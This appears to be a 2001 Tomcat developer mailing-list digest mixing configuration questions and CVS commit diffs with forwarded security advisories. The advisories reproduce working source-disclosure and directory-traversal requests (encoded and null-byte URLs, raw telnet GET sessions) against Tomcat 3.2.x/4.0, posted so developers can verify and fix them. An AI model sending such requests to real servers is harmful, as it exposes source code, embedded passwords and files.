non-ascii characters in URL
hi, i have run into a problem with non ascii-url characters. When there is e.g. the German = auml in an URL, I have to encode it as follows: APACHE alone, non-ascii character anywhere: http://mydomain.de/d%E4mlich.html TOMCAT standalone, non-ascii character anywhere: http://mydomain.de:8080/requ%E4st.jsp?dummy=d%E4mlich APACHE+TOMCAT, non-ascii character in parameters: http://mydomain.de/request.jsp?dummy=d%E4mlich Now before you say, this is really getting boring, watch out: APACHE+TOMCAT, non-ascii character in URI-part: http://mydomain.de/requ%C3%A4st.jsp Obviously, in the last example, the encoding follows rather Unicode than ISO-Latin. As this is conflicting with the "usual" behaviour shown above, I am looking for a solution for the last case. Does anybody know a workaround or a version of apache or tomcat or mod_jk that would solve the problem ? Your help will be very much appreciated. Stefan BTW I am using: tomcat 3.2.1 apache 1.3.19, connected through mod_jk solaris 2.8 on intel jdk 1.3 from sun
jsp:include problem
Are there any problems in using jakarta-tomcat-3.2.1 and the jsp:include statement ? The jsp:include statement, running well on older versions, doesn't work on jakarta-tomcat-3.2.1 with jdk 1.2.2. There is no according code segment within the JAVA-file generated by the JSP-engine. Regards, Dirk Keller
servlet
I am developing a web page, which will have the link to copyright protected reference materials. I will be using some web-builder tool such as front-page or dream-weaver. The problem faced is the implementation of access control over the refrence material, which is nothing but pdf files. the control should be such that when a user is aacessing, viewing or using a file no other user user should be able to view or access that file i.e. one user, one file at a time. I am in a fix, what to do? should i use the singlethreadmodel interface of servlet or jsp to develop this control, but i am afraid that i will end up in writing 300 servlet classes each crresponding to one pdf file. Any suggestions addressing this problem? Thanking you. Pushpendra Singh.
Re: context factories
"Craig R. McClanahan" wrote: If you don't mind specifying the resource factory class yourself, you don't need to modify any code at all -- just configure it in server.xml like this: Context path="/myapp" ... ... Resource name="jndi/ContextPool" type="com.mycompany.ContextPool"/ ResouceParams name="jndi/ContextPool" parameter namefactory/name valuecom.mycompany.ContextPoolFactory/value /parameter parameternamename/namevaluevalue/value/parameter ... /ResourceParams ... /Context where "com.mycompany.ContextPoolFactory" is a class that implements javax.naming.spi.ObjectFactory. You can use the existing factories as examples of how such factories can access the declared resource parameters and use them to configure the object itself. Ok, I've configured this, and all I get back from the initCtx.lookup() method is a ResourceRef, not a ContextPool. I have found the reason for this to be that the "instanceof" check in the getObjectInstance() method in org.apache.naming.factory.ResourceFactory fails, and this must be due to classloader issues. What are the magic spells I need to cast to get classloading right? Can I put the ContextPoolFactory in an independent jar file in lib, common/lib or server/lib? -- - Torgeir
TC3.2.x and security problems
Has anyone on tomcat-dev been able to reproduce these problems using Tomcat 3.2.x? I've been trying to reproduce the error using 3.2.1, 3.2.2b2 and even 3.1.1. So far I always get a 404. I've never been able to get directory listing or JSP source. The beta 2 time period is just about over. With the exception of this reported security problem, no critical bugs have been found during this beta cycle. I plan to call the final release vote soon, but I want to make sure this securiy problem isn't real before I do that. Original Message From: [EMAIL PROTECTED] (Jon Stevens) Subject: Re: CHINANSL Security Advisory(CSA-200108) Newsgroups: lists.bugtraq on 3/30/01 11:26 PM, "lovehacker" [EMAIL PROTECTED] wrote: Topic: Tomcat 3.2.1 for win2000 Directory traversal Vulnerability vulnerable: Tomcat 3.2.1 for win2000 maybe for other operating system also. discussion: A security vulnerability has been found in Windows NT/2000 systems that have Tomcat 3.2.1 installed.The vulnerability allows remote attackers to access files outside the document root directory scope. exploits: http://target:8080/%2e%2e/%2e%2e/%00.jsp It is possible to cause the Tomcat server to Listing outside the document root directory scope. solution: None Copyright 2000-2001 CHINANSL. All Rights Reserved. Terms of use. CHINANSL Security Team [EMAIL PROTECTED] CHINANSL INFORMATION TECHNOLOGY CO.,LTD (http://www.chinansl.com) What is with this Copyright stuff? #1. Please report security issues to [EMAIL PROTECTED] and/or [EMAIL PROTECTED] first. It seems like that is a common courtesy. #2. Please test against the latest Tomcat 4.0 which is 4.0b2. I believe that this has already been fixed. p.s. Your [EMAIL PROTECTED] email address bounces. -jon
RE: servlet
A suggestion : First, you really need to manage a session for each user, because when a user get the file, he must release it when he has read it. That means that either he send another request to release the file or the session has "timeouted", which drives to the file release. Second, what you can do is to keep a kind of association between a file and a user. When another user request for an already used page, you should parse this association to see if the file is used by somebody or not. Third, this association must be persistent. Just use a static class that will be loaded once and used many times, and will never been discarded until the server die. Fourth, be careful with concurent access to this association. When you are searching in the association, you must be alone doing it. If not, you wont be able to avoid a multiple access to a file. Emmanuel Lcharny, IKTEK 06 08 33 32 61, www.iktek.com http://www.iktek.com -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Envoy : mercredi 4 avril 2001 14:38 : [EMAIL PROTECTED] Objet : servlet I am developing a web page, which will have the link to copyright protected reference materials. I will be using some web-builder tool such as front-page or dream-weaver. The problem faced is the implementation of access control over the refrence material, which is nothing but pdf files. the control should be such that when a user is aacessing, viewing or using a file no other user user should be able to view or access that file i.e. one user, one file at a time. I am in a fix, what to do? should i use the singlethreadmodel interface of servlet or jsp to develop this control, but i am afraid that i will end up in writing 300 servlet classes each crresponding to one pdf file. Any suggestions addressing this problem? Thanking you. Pushpendra Singh.
Re: context factories
Btw, if I replace the instanceof test with a
getClass().getName().equals("org.apache.naming.ResourceRef")
it all works.
--
- Torgeir
FW: Cocoon on iSeries = mod_jk is in use.
Just look what an AS/400 user send me. Thanks to Gal Shachor (ServletExpress WebSphere). -Original Message- From: David Morris [mailto:[EMAIL PROTECTED]] Sent: Wednesday, April 04, 2001 5:12 PM To: [EMAIL PROTECTED] Subject: RE: Cocoon on iSeries Henri, While investigating how the new Apache admin instance runs servlets without WebSphere, I looked at the Apache config file. I found the following: # Servlet engine directives LoadModule jk_module /QSYS.LIB/QHTTPSVR.LIB/QZTCJK.SRVPGM JkWorkersFile /QIBM/ProdData/HTTPA/admin/conf/workers.properties JkLogFile /QIBM/UserData/HTTPA/admin/logs/jk.log JkLogLevel error JkMount /HTTPAdmin jni JkMount /HTTPAdmin/*jni JkMount /BtoB/Connect jni JkMount /BtoB/Connect/* jni By looking at the WebSphere plug-in config, I am reasonably certain that this is a port of mod_jk. David Morris GOMEZ Henri [EMAIL PROTECTED] 04/03/01 02:13AM http://www-1.ibm.com/servers/eserver/iseries/software/http/ Take the HTTP Server (powered by Apache) link. This will tell you everything you need to know about Apache on iSeries. Fine site, how could they have a Apache 2.0 since it's still at apache in alpha-15 ? BTW, where did you get the mod_jk ?...
[Fwd: Tomcat may reveal script source code by URL trickery]
Reported against Tomcat 3.2.1 on BugTraq.
Craig
Eric Daniel Mauricio wrote:
There is another way to get the source from a jsp page using Tomcat.
If you don't write HTTP/1.0 or HTTP/1.1 in the end of the GET request,
you will get the source code and not the jsp processed.
In other words, use Apache + Tomcat if you intend to protect your source code.
telnet maq106 8080
Trying 10.0.0.106...
Connected to maq106
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)
!--
Copyright (c) 1999 The Apache Software Foundation. All rights
reserved.
Number Guess Game
Written by Jason Hunter, CTO, KA Software
http://www.servlets.com
--
%@ page import = "num.NumberGuessBean" %
jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/
jsp:setProperty name="numguess" property="*"/
html
headtitleNumber Guess/title/head
body bgcolor="white"
font size=4
% if (numguess.getSuccess()) { %
Congratulations! You got it.
And after just %= numguess.getNumGuesses() % tries.p
% numguess.reset(); %
Care to a href="numguess.jsp"try again/a?
% } else if (numguess.getNumGuesses() == 0) { %
Welcome to the Number Guess game.p
I'm thinking of a number between 1 and 100.p
form method=get
What's your guess? input type=text name=guess
input type=submit value="Submit"
/form
% } else { %
Good guess, but nope. Try b%= numguess.getHint() %/b.
You have made %= numguess.getNumGuesses() % guesses.p
I'm thinking of a number between 1 and 100.p
form method=get
What's your guess? input type=text name=guess
input type=submit value="Submit"
/form
% } %
/font
/body
/html
Connection closed by foreign host.
[],
ericmau
"Sverre H. Huseby" [EMAIL PROTECTED] escreveu:
Tomcat may reveal script source code by URL trickery
Sverre H. Huseby advisory 2001-03-29
Systems affected
Tomcat 4.0-b1 (latest milestone) and nighly build as of 2001-03-28
tested. Other versions may be vulnerable too. The problem is only
present when using Tomcat's built in web server, not when using Tomcat
with Apache Web Server.
Description
---
Tomcat (http://jakarta.apache.org/tomcat/), the Reference
Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
Technologies, may be tricked into revealing the source code of JSP
scripts by using simple URL encoding.
Details
---
It seems that the built in web server in Tomcat does URL decoding in
an unreasonable order. URLs like the following
http://XXX:8080/examples/jsp/num/numguess.js%70
where %70 is an URL encoded 'p', returns the source code of index.jsp
rather than running the script on the server side.
To speculate: The JSP handler is skipped as this URL does not end in
".jsp", but the static file handler is nevertheless able to map the
URL into a correct file name.
Impact
--
This design error makes it possible to fetch the source code of JSP
scripts. Such source code may contain database passwords and file
names, and may reveal design errors or programming bugs that make it
possible to further exploit the server or service.
Reported by Sverre H. Huseby, [EMAIL PROTECTED]
--
URL:mailto:[EMAIL PROTECTED]
URL:http://shh.thathost.com/
RE: [Fwd: Tomcat may reveal script source code by URL trickery]
TC 4.0B3 sources still missing in : http://jakarta.apache.org/builds/jakarta-tomcat-4.0/release/v4.0-b3/src/
Re: [Fwd: Tomcat may reveal script source code by URL trickery]
I know that these are just minor bugs in Tomcat (and other servlet
containers as well), but man, this is getting ridiculous. This is clearly
yet another reason to not use JSP. Especially when you have sites like this:
http://www.devshed.com/Server_Side/Jserv/JSP5/page3.html
Actually *encouraging* people to put their usernames and passwords into
their JSP files. The term "Gross negligence" comes to mind.
-jon
on 4/4/01 9:08 AM, "Craig R. McClanahan" [EMAIL PROTECTED]
wrote:
Reported against Tomcat 3.2.1 on BugTraq.
Craig
Eric Daniel Mauricio wrote:
There is another way to get the source from a jsp page using Tomcat.
If you don't write HTTP/1.0 or HTTP/1.1 in the end of the GET request,
you will get the source code and not the jsp processed.
In other words, use Apache + Tomcat if you intend to protect your source
code.
telnet maq106 8080
Trying 10.0.0.106...
Connected to maq106
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)
!--
Copyright (c) 1999 The Apache Software Foundation. All rights
reserved.
Number Guess Game
Written by Jason Hunter, CTO, KA Software
http://www.servlets.com
--
%@ page import = "num.NumberGuessBean" %
jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/
jsp:setProperty name="numguess" property="*"/
html
headtitleNumber Guess/title/head
body bgcolor="white"
font size=4
% if (numguess.getSuccess()) { %
Congratulations! You got it.
And after just %= numguess.getNumGuesses() % tries.p
% numguess.reset(); %
Care to a href="numguess.jsp"try again/a?
% } else if (numguess.getNumGuesses() == 0) { %
Welcome to the Number Guess game.p
I'm thinking of a number between 1 and 100.p
form method=get
What's your guess? input type=text name=guess
input type=submit value="Submit"
/form
% } else { %
Good guess, but nope. Try b%= numguess.getHint() %/b.
You have made %= numguess.getNumGuesses() % guesses.p
I'm thinking of a number between 1 and 100.p
form method=get
What's your guess? input type=text name=guess
input type=submit value="Submit"
/form
% } %
/font
/body
/html
Connection closed by foreign host.
[],
ericmau
"Sverre H. Huseby" [EMAIL PROTECTED] escreveu:
Tomcat may reveal script source code by URL trickery
Sverre H. Huseby advisory 2001-03-29
Systems affected
Tomcat 4.0-b1 (latest milestone) and nighly build as of 2001-03-28
tested. Other versions may be vulnerable too. The problem is only
present when using Tomcat's built in web server, not when using Tomcat
with Apache Web Server.
Description
---
Tomcat (http://jakarta.apache.org/tomcat/), the Reference
Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
Technologies, may be tricked into revealing the source code of JSP
scripts by using simple URL encoding.
Details
---
It seems that the built in web server in Tomcat does URL decoding in
an unreasonable order. URLs like the following
http://XXX:8080/examples/jsp/num/numguess.js%70
where %70 is an URL encoded 'p', returns the source code of index.jsp
rather than running the script on the server side.
To speculate: The JSP handler is skipped as this URL does not end in
".jsp", but the static file handler is nevertheless able to map the
URL into a correct file name.
Impact
--
This design error makes it possible to fetch the source code of JSP
scripts. Such source code may contain database passwords and file
names, and may reveal design errors or programming bugs that make it
possible to further exploit the server or service.
Reported by Sverre H. Huseby, [EMAIL PROTECTED]
--
URL:mailto:[EMAIL PROTECTED]
URL:http://shh.thathost.com/
RE: [Fwd: Tomcat may reveal script source code by URL trickery]
This is already fixed in 3.2.2.
-Original Message-
From: Craig R. McClanahan [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, April 04, 2001 11:09 AM
To: [EMAIL PROTECTED]
Subject: [Fwd: Tomcat may reveal script source code by URL trickery]
Reported against Tomcat 3.2.1 on BugTraq.
Craig
Eric Daniel Mauricio wrote:
There is another way to get the source from a jsp page using Tomcat.
If you don't write HTTP/1.0 or HTTP/1.1 in the end of the GET request,
you will get the source code and not the jsp processed.
In other words, use Apache + Tomcat if you intend to protect
your source code.
telnet maq106 8080
Trying 10.0.0.106...
Connected to maq106
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2;
Java 1.3.0;
Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)
!--
Copyright (c) 1999 The Apache Software Foundation. All rights
reserved.
Number Guess Game
Written by Jason Hunter, CTO, KA Software
http://www.servlets.com
--
%@ page import = "num.NumberGuessBean" %
jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/
jsp:setProperty name="numguess" property="*"/
html
headtitleNumber Guess/title/head
body bgcolor="white"
font size=4
% if (numguess.getSuccess()) { %
Congratulations! You got it.
And after just %= numguess.getNumGuesses() % tries.p
% numguess.reset(); %
Care to a href="numguess.jsp"try again/a?
% } else if (numguess.getNumGuesses() == 0) { %
Welcome to the Number Guess game.p
I'm thinking of a number between 1 and 100.p
form method=get
What's your guess? input type=text name=guess
input type=submit value="Submit"
/form
% } else { %
Good guess, but nope. Try b%= numguess.getHint() %/b.
You have made %= numguess.getNumGuesses() % guesses.p
I'm thinking of a number between 1 and 100.p
form method=get
What's your guess? input type=text name=guess
input type=submit value="Submit"
/form
% } %
/font
/body
/html
Connection closed by foreign host.
[],
ericmau
"Sverre H. Huseby" [EMAIL PROTECTED] escreveu:
Tomcat may reveal script source code by URL trickery
Sverre H. Huseby advisory 2001-03-29
Systems affected
Tomcat 4.0-b1 (latest milestone) and nighly build as of 2001-03-28
tested. Other versions may be vulnerable too. The problem is only
present when using Tomcat's built in web server, not when using Tomcat
with Apache Web Server.
Description
---
Tomcat (http://jakarta.apache.org/tomcat/), the Reference
Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
Technologies, may be tricked into revealing the source code of JSP
scripts by using simple URL encoding.
Details
---
It seems that the built in web server in Tomcat does URL decoding in
an unreasonable order. URLs like the following
http://XXX:8080/examples/jsp/num/numguess.js%70
where %70 is an URL encoded 'p', returns the source code of index.jsp
rather than running the script on the server side.
To speculate: The JSP handler is skipped as this URL does not end in
".jsp", but the static file handler is nevertheless able to map the
URL into a correct file name.
Impact
--
This design error makes it possible to fetch the source code of JSP
scripts. Such source code may contain database passwords and file
names, and may reveal design errors or programming bugs that make it
possible to further exploit the server or service.
Reported by Sverre H. Huseby, [EMAIL PROTECTED]
--
URL:mailto:[EMAIL PROTECTED]
URL:http://shh.thathost.com/
Re: [Fwd: Tomcat may reveal script source code by URL trickery]
You're right! That's another reason to use a model 2 based approach but, of course, JSP still allows you to shoot you on your foot if you are fool enough to do so. That's one of the reasons we chose a model 2 based approach with XML-XSLT for the interface creation, no JSP involved: no feet in danger ;). just my 2c, Dan Jon Stevens wrote: I know that these are just minor bugs in Tomcat (and other servlet containers as well), but man, this is getting ridiculous. This is clearly yet another reason to not use JSP. Especially when you have sites like this: http://www.devshed.com/Server_Side/Jserv/JSP5/page3.html Actually *encouraging* people to put their usernames and passwords into their JSP files. The term "Gross negligence" comes to mind. -jon ...snip for brevity's sake
cvs commit: jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/util Base64.java
remm01/04/04 11:12:19
Modified:catalina/src/share/org/apache/catalina/util Base64.java
Log:
- Update to the new version of the Xerces Base64 encoder/decoder.
The old one had problems encoding binary content.
Revision ChangesPath
1.2 +77 -49
jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/util/Base64.java
Index: Base64.java
===
RCS file:
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/util/Base64.java,v
retrieving revision 1.1
retrieving revision 1.2
diff -u -r1.1 -r1.2
--- Base64.java 2000/08/11 17:01:49 1.1
+++ Base64.java 2001/04/04 18:12:19 1.2
@@ -1,7 +1,7 @@
/*
- * $Header:
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/util/Base64.java,v
1.1 2000/08/11 17:01:49 craigmcc Exp $
- * $Revision: 1.1 $
- * $Date: 2000/08/11 17:01:49 $
+ * $Header:
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/util/Base64.java,v
1.2 2001/04/04 18:12:19 remm Exp $
+ * $Revision: 1.2 $
+ * $Date: 2001/04/04 18:12:19 $
*
*
*
@@ -67,36 +67,35 @@
/**
* This class provides encode/decode for RFC 2045 Base64 as
- * defined by RFC 2045, N. Freed and N. Borenstein.
+ * defined by RFC 2045, N. Freed and N. Borenstein.
* RFC 2045: Multipurpose Internet Mail Extensions (MIME)
* Part One: Format of Internet Message Bodies. Reference
- * 1996 Available at: http://www.ietf.org/rfc/rfc2045.txt
+ * 1996 Available at: http://www.ietf.org/rfc/rfc2045.txt
* This class is used by XML Schema binary format validation
*
* @author Jeffrey Rodriguez
- * @version $Revision: 1.1 $ $Date: 2000/08/11 17:01:49 $
+ * @version $Id: Base64.java,v 1.2 2001/04/04 18:12:19 remm Exp $
*/
-public final class Base64 {
-
-
-static private final int BASELENGTH = 255;
-static private final int LOOKUPLENGTH = 63;
+public final class Base64 {
+static private final int BASELENGTH = 255;
+static private final int LOOKUPLENGTH = 64;
static private final int TWENTYFOURBITGROUP = 24;
static private final int EIGHTBIT = 8;
static private final int SIXTEENBIT = 16;
static private final int SIXBIT = 6;
static private final int FOURBYTE = 4;
-
-
-static private final byte PAD = ( byte ) '=';
-static private byte [] base64Alphabet = new byte[BASELENGTH];
+static private final int SIGN = -128;
+static private final byte PAD= ( byte ) '=';
+static private final boolean fDebug = false;
+static private byte [] base64Alphabet = new byte[BASELENGTH];
static private byte [] lookUpBase64Alphabet = new byte[LOOKUPLENGTH];
+
static {
for (int i = 0; iBASELENGTH; i++ ) {
-base64Alphabet[i] = -1;
+base64Alphabet[i] = -1;
}
for ( int i = 'Z'; i = 'A'; i-- ) {
base64Alphabet[i] = (byte) (i-'A');
@@ -109,10 +108,10 @@
base64Alphabet[i] = (byte) (i-'0' + 52);
}
-base64Alphabet['+'] = 62;
+base64Alphabet['+'] = 62;
base64Alphabet['/'] = 63;
- for (int i = 0; i=25; i++ )
+for (int i = 0; i=25; i++ )
lookUpBase64Alphabet[i] = (byte) ('A'+i );
for (int i = 26, j = 0; i=51; i++, j++ )
@@ -120,17 +119,23 @@
for (int i = 52, j = 0; i=61; i++, j++ )
lookUpBase64Alphabet[i] = (byte) ('0' + j );
+lookUpBase64Alphabet[62] = (byte) '+';
+lookUpBase64Alphabet[63] = (byte) '/';
}
+public static boolean isBase64( String isValidString ){
+return( isArrayByteBase64( isValidString.getBytes()));
+}
+
-static boolean isBase64( byte octect ) {
+public static boolean isBase64( byte octect ) {
//shall we ignore white space? JEFF??
-return(octect == PAD || base64Alphabet[octect] != -1 );
+return(octect == PAD || base64Alphabet[octect] != -1 );
}
-static boolean isArrayByteBase64( byte[] arrayOctect ) {
+public static boolean isArrayByteBase64( byte[] arrayOctect ) {
int length = arrayOctect.length;
if ( length == 0 )
return false;
@@ -143,13 +148,13 @@
/**
* Encodes hex octects into Base64
- *
+ *
* @param binaryData Array containing binaryData
* @return Encoded Base64 array
*/
-public byte[] encode( byte[] binaryData ) {
+public static byte[] encode( byte[] binaryData ) {
int
cvs commit: jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/servlets WebdavServlet.java
remm01/04/04 11:23:08
Modified:catalina/src/share/org/apache/catalina/servlets
WebdavServlet.java
Log:
- Fix thread safety problems with the WebDAV servlet. The problem was
that the JAXP document builder was not thread safe. Now, a new instance
will be created on each request.
The problem was reported and fixed by Juergen Pill in Slide, but I forgot to
backport the fix (sorry ...), and it was reported again by Max du Prel mduprel at
leveld.de
Revision ChangesPath
1.14 +23 -13
jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/servlets/WebdavServlet.java
Index: WebdavServlet.java
===
RCS file:
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/servlets/WebdavServlet.java,v
retrieving revision 1.13
retrieving revision 1.14
diff -u -r1.13 -r1.14
--- WebdavServlet.java2001/03/06 02:27:44 1.13
+++ WebdavServlet.java2001/04/04 18:23:06 1.14
@@ -1,7 +1,7 @@
/*
- * $Header:
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/servlets/WebdavServlet.java,v
1.13 2001/03/06 02:27:44 remm Exp $
- * $Revision: 1.13 $
- * $Date: 2001/03/06 02:27:44 $
+ * $Header:
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/servlets/WebdavServlet.java,v
1.14 2001/04/04 18:23:06 remm Exp $
+ * $Revision: 1.14 $
+ * $Date: 2001/04/04 18:23:06 $
*
*
*
@@ -125,7 +125,7 @@
* are handled by the DefaultServlet.
*
* @author Remy Maucherat
- * @version $Revision: 1.13 $ $Date: 2001/03/06 02:27:44 $
+ * @version $Revision: 1.14 $ $Date: 2001/04/04 18:23:06 $
*/
public class WebdavServlet
@@ -215,9 +215,9 @@
/**
- * JAXP Document builder.
+ * JAXP Document builder factory.
*/
-private DocumentBuilder documentBuilder;
+private DocumentBuilderFactory documentBuilderFactory;
/**
@@ -275,13 +275,7 @@
;
}
-try {
-documentBuilder =
-DocumentBuilderFactory.newInstance().newDocumentBuilder();
-} catch(ParserConfigurationException e) {
-throw new ServletException
-(sm.getString("webdavservlet.jaxpfailed"));
-}
+documentBuilderFactory = DocumentBuilderFactory.newInstance();
}
@@ -431,7 +425,15 @@
Node propNode = null;
+DocumentBuilder documentBuilder = null;
try {
+documentBuilder = documentBuilderFactory.newDocumentBuilder();
+} catch(ParserConfigurationException e) {
+throw new ServletException
+(sm.getString("webdavservlet.jaxpfailed"));
+}
+
+try {
Document document = documentBuilder.parse
(new InputSource(req.getInputStream()));
@@ -839,6 +841,14 @@
int lockRequestType = LOCK_CREATION;
Node lockInfoNode = null;
+
+DocumentBuilder documentBuilder = null;
+try {
+documentBuilder = documentBuilderFactory.newDocumentBuilder();
+} catch(ParserConfigurationException e) {
+throw new ServletException
+(sm.getString("webdavservlet.jaxpfailed"));
+}
try {
Document document = documentBuilder.parse(new InputSource
Just say no to JSP Re: [Fwd: Tomcat may reveal script sourcecode by URL trickery]
on 4/4/01 11:06 AM, "Brad Cox" [EMAIL PROTECTED] wrote: My article about a servlet-based alternative to JSP is in this month's Dr. Dobbs Journal and at http://www.ddj.com/articles/2001/0105/0105i/0105i.htm. The draft with source code is at http://virtualschool.edu/wap. I love the article title: "Just say no to JSP" I'm so happy to see that more and more people are waking up to the fact that JSP is bad. I'm also happy to see you worry about form validation issues. That is a problem that we are currently solving in Turbine right now. It is called "Intake". :-) It is sad to me that you: #0. Apache/JServe. Can't spell the product name correctly even though it has been around for 4+ years. :-) #1. Confused "Turbine" with "add programming language features to HTML". #2. Confused "WebMacro" and thus Velocity with "add programming language features to HTML". If you spend time with the products, you would see that isn't the case and you might actually retract your statements. I have more comments, but no time right now and this probably isn't the right forum anyway... :-) -jon
[T4b3] mod_webapps
Folks, I am having a problem to make mod_webapp module for NT by follwing the instruction in server.xml with gcc. It's a kind of my wish that it will be nice to have either have an already-built module or VC++ makefile for WIN32. Is this too much to ask? Pae
Re: TC3.2.x and security problems
On Wed, Apr 04, 2001 at 08:35:11AM -0500, Marc Saegesser wrote: Has anyone on tomcat-dev been able to reproduce these problems using Tomcat 3.2.x? I've been trying to reproduce the error using 3.2.1, 3.2.2b2 and even 3.1.1. So far I always get a 404. I've never been able to get directory listing or JSP source. [...] exploits: http://target:8080/%2e%2e/%2e%2e/%00.jsp It is possible to cause the Tomcat server to Listing outside the document root directory scope. I can't reproduce that one, but could verify the following problems on Linux: $ telnet localhost 8080 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /examples/jsp/num/numguess.jsp HTTP/1.0 200 OK Content-Type: text/plain Content-Length: 1237 Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.) [numguess.jsp source follows] $ telnet localhost 8180 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /examples/jsp/num/numguess.jsp%00 HTTP/1.0 200 OK Content-Type: text/plain Content-Length: 1237 Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.) [numguess.jsp source follows] $ telnet localhost 8180 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /%252e%252e/%252e%252e/%00.jsp HTTP/1.0 200 OK Content-Type: text/html;charset=ISO-8859-1 Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.) [directory listing follows] -- Stephan Seyboth - Developer Caldera (Deutschland) GmbH http://www.caldera.de/
Re: FW: Tomcat may reveal script source code by URL trickery 2
On Tue, Apr 03, 2001 at 04:04:46PM -0700, Jon Stevens wrote: -- From: "Sverre H. Huseby" [EMAIL PROTECTED] Reply-To: "Sverre H. Huseby" [EMAIL PROTECTED] Date: Tue, 3 Apr 2001 10:25:26 +0200 To: [EMAIL PROTECTED] Subject: Tomcat may reveal script source code by URL trickery 2 [...] Systems affected Tomcat 4.0-b2, which includes fixes for a similar bug. Other versions before 4.0-b3 may be vulnerable too. The Tomcat team was notified on 2001-04-01, and they provided a fix on 2001-04-03. Everybody should upgrade to at least Tomcat 4.0 beta 3. As far as I understand and can verify by testing, both Tomcat 3.2.1 and 3.2.2b2 are vulnerable to variations of this attack. What is the correct solution for people using 3.2.1, since that is the recommended release for production use? $ telnet localhost 8080 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /examples/jsp/num/numguess.jsp HTTP/1.0 200 OK Content-Type: text/plain Content-Length: 1237 Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.) [numguess.jsp source follows] $ telnet localhost 8180 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /examples/jsp/num/numguess.jsp%00 HTTP/1.0 200 OK Content-Type: text/plain Content-Length: 1237 Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.) [numguess.jsp source follows] Also could someone more familiar with the Tomcat code explain the problem in more detail? I'm still new to Tomcat, so a pointer to the relevant parts of the source would be very much appreciated. Thanks -- Stephan Seyboth - Developer Caldera (Deutschland) GmbH http://www.caldera.de/
RE: TC3.2.x and security problems
I can't reproduce that one, but could verify the following problems on Linux: $ telnet localhost 8080 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /examples/jsp/num/numguess.jsp HTTP/1.0 200 OK Content-Type: text/plain Content-Length: 1237 Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.) [numguess.jsp source follows] It didn't appear in tomcat 3.3-m2
Jasper34 refactoring proposal status
Hi folks, First, I want to apologize for how long it has taken me to get this proposal done. There have been external factors beyond my control, but requiring my time (more on that below). The good news, is that it is almost done. Also, the level of detail should lend itself to rapid implementation (by doing the high-level design in Together, many of the classes are already coded and at least stubbed). Also, it should be possible to develop this completely in parallel with no impact on the current JspServlet. Also, I should shortly have lotsa time to devote to this. The bad news is that the external factors are that my company's equivalent of Daddy Warbucks (our funding source) has gotten cold feet and I am about to become a statistic of the fall of the dot-com economy. :-| Hence the sudden 'free time'... Should any of you know of an opening for a senior java developer/architect/CTO/director of development type-person, feel free to contact me and I'll be glad to share my resume'. My preference is for product development and I have a high interest in building development tools/frameworks and distributed architectures, but I'd love to hear about any interesting opportunity. We currently live in Baltimore, MD, but would consider relocating for the right opportunity. Also, if anybody can point me towards sites with info and help on being an independent contractor, I'd appreciate the tips. Okay, sorry about the off-topic - I realize this stuff better belongs on a Job-posting board. I'll get back to the UML diagrams now. :-) mel Dr. Mel Martinez 